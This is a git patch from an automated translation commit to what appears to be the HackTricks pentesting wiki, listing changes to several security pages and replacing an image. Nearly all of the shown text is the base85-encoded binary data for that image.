From b25d4663a6fdbdca5cf529c778417b8ddad0a722 Mon Sep 17 00:00:00 2001
From: Translator
Date: Tue, 7 Oct 2025 10:27:07 +0000
Subject: [PATCH] Translated ['', 'src/pentesting-web/command-injection.md', 'src/linux-ha

---
 src/images/k8studio.jpg                    | Bin 6667 -> 0 bytes
 src/images/k8studio.png                    | Bin 0 -> 88827 bytes
 .../privilege-escalation/README.md         | 625 +++++++++---------
 .../pentesting-web/cgi.md                  |  53 +-
 .../pentesting-web/web-api-pentesting.md   |  96 ++-
 .../pentesting-web/wordpress.md            | 452 ++++++-------
 src/pentesting-web/command-injection.md    |  52 +-
 src/welcome/hacktricks-values-and-faq.md   | 118 ++--
 8 files changed, 717 insertions(+), 679 deletions(-)
 delete mode 100644 src/images/k8studio.jpg
 create mode 100644 src/images/k8studio.png
diff --git a/src/images/k8studio.jpg b/src/images/k8studio.jpg
deleted file mode 100644
index 1c427e89fa5348b69ee377112fe4841a2960c2f8..0000000000000000000000000000000000000000
GIT binary patch
literal 0

literal 6667
diff --git a/src/images/k8studio.png b/src/images/k8studio.png
new file mode 100644
index 0000000000000000000000000000000000000000..0add889f2f1854c1141ca35b43a867a37bbb1b57
GIT binary patch
literal 88827
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 